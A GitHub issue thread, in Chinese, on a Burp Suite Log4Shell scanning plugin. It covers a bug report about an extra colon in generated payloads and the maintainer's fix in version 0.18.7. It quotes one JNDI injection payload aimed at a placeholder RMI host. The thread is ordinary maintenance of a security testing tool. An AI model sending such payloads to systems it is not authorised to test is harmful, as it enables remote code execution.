### ISSUE TITLE
大佬 请教下有办法取消默认的url吗？还有为啥payload会多个冒号呢？

### ISSUE THREAD

**Issue by NxStudy** [f0ng/log4j2burpscanner#49]
这是生成的payload %24{jndi:rmi:://ip:port/%20test}

**Comment by f0ng** [comment]
1. 取消默认url，可以自定义dnslog记录平台，ceye或者自己建立一个，在`dnslog configuration`里配置
2. payload多冒号应该是配置问题，可以贴下你的配置

**Comment by NxStudy** [comment]
![image](https://user-images.githubusercontent.com/50871453/165031891-1497ed73-d760-4b7f-977d-abeede11713c.png)
![image](https://user-images.githubusercontent.com/50871453/165032058-731dde0d-62a4-4c82-ba51-fb27d6e127f9.png)
![Uploading image.png…]()

**Comment by f0ng** [comment]
感谢反馈，确实存在该缺陷，源于对`isip`参数的逻辑判断出问题了

**Comment by f0ng** [comment]
另发现在勾选`isip`框后，请求体中没有payload。`0.18.7`版本一并修复，感谢师傅反馈

**Comment by f0ng** [comment]
这是正常处理

**Comment by f0ng** [comment]
在被动扫描的时候payload为`$`，在`send to scanner`的时候，`$`会编码
